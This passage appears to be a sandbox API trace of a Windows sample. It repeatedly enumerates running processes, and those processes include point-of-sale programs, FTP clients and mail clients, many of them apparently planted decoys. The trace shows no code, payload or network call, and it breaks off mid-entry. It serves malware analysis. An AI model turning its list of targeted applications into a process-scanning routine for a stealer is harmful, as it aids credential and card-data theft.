Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0268.489] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0268.491] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0268.492] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0268.494] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0268.496] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0268.501] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0268.505] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0268.506] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0268.508] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0268.510] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0268.519] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0268.521] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0268.523] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0268.525] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0268.532] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0268.535] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0268.538] CloseHandle (hObject=0x1d14) returned 1 [0268.538] Sleep (dwMilliseconds=0x64) [0268.657] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0268.673] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.676] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0268.678] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0268.680] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0268.683] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0268.692] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0268.694] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0268.695] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0268.697] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0268.754] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.756] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.758] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0268.759] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.764] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.765] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.767] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.768] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.770] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.771] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.773] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0268.774] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0268.776] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0268.780] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.782] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0268.783] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0268.785] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0268.786] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0268.787] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0268.789] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.790] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0268.905] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0268.907] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0268.909] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0268.910] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0268.912] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0268.914] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0268.988] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0268.990] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0268.993] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0268.999] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0269.001] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0269.003] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0269.005] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0269.007] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0269.009] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0269.014] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0269.016] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0269.018] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0269.020] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0269.022] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0269.024] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0269.026] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0269.207] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0269.210] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0269.212] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0269.217] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0269.219] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0269.221] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0269.223] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0269.226] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0269.229] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0269.234] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0269.236] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0269.239] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0269.241] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0269.244] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0269.280] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, 